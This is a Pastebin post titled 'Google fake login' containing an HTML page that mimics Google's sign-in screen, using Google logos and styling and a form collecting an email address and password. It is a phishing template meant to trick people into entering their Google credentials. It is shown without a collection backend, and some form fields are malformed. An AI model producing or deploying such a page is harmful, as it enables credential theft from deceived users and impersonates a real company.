AlexaMP

Google fake login

Jan 24th, 2020
520
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.75 KB | None | 0 0
  1. <html>
  2.     <head>
  3.         <title>Google - Login</title>
  4.         <link rel='shortcut icon' href='https://cdn.freebiesupply.com/logos/large/2x/google-g-2015-logo-png-transparent.png'>
  5.         <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet">
  6.         <style type='text/css'>
  7.         body{
  8.             margin:0;
  9.             color:#000;
  10.             background:#fff;
  11.             text-align:center;
  12.             font-family: 'Roboto', sans-serif;
  13.         }
  14.         img{
  15.             width:100px;
  16.             margin-top:80px;
  17.         }
  18.         form{
  19.             margin:0 auto;
  20.             font-family: 'Roboto', sans-serif;
  21.         }
  22.         .form{
  23.             margin:0 auto;
  24.             max-width:500px;
  25.             background:#f7f7f7;
  26.             border-radius:5px;
  27.             border:1px solid #f7f7f7;
  28.             text-align:center;
  29.         }
  30.         .text{
  31.             width:100%;
  32.             background:#fff;
  33.             border:1px solid #fff;
  34.             padding:10px;
  35.             margin-top:5px;
  36.             margin-bottom:5px;
  37.             color:#000;
  38.         }
  39.         .text-alert{
  40.             width:100%;
  41.             background:#fff;
  42.             border:1px solid #FF2828;
  43.             padding:10px;
  44.             margin-top:5px;
  45.             margin-bottom:5px;
  46.             color:#000;
  47.         }
  48.         .submit{
  49.             width:100%;
  50.             background:#4b8df8;
  51.             border:1px solid #4b8df8;
  52.             padding:10px;
  53.             margin-top:20px;
  54.             margin-bottom:5px;
  55.             color:#fff;
  56.             text-align:center;
  57.             border-radius:5px;
  58.         }
  59.         </style>
  60.         <body>
  61.             <img src='https://cdn.worldvectorlogo.com/logos/google-2015.svg'><br/><br/><br/>
  62.             <div class='form'>
  63.                 <br/>
  64.                 <img src='https://i.dlpng.com/static/png/6542357_preview.png' style='margin:0 auto;'>
  65.                 <br/>
  66.                 <form method='post' action=''>
  67.                     <div style='padding:15px;'>
  68.                     <input class='text-alert' placeholder='Email address' name='email'>
  69.                     <input class='text' placeholder='Password' name='password'>
  70.                     <input class='submit' value='Log In'>
  71.                     </div>
  72.                 </form>
  73.             </div>
  74.         </body>
  75.     </head>
  76. </html>
Add Comment
Please, Sign In to add comment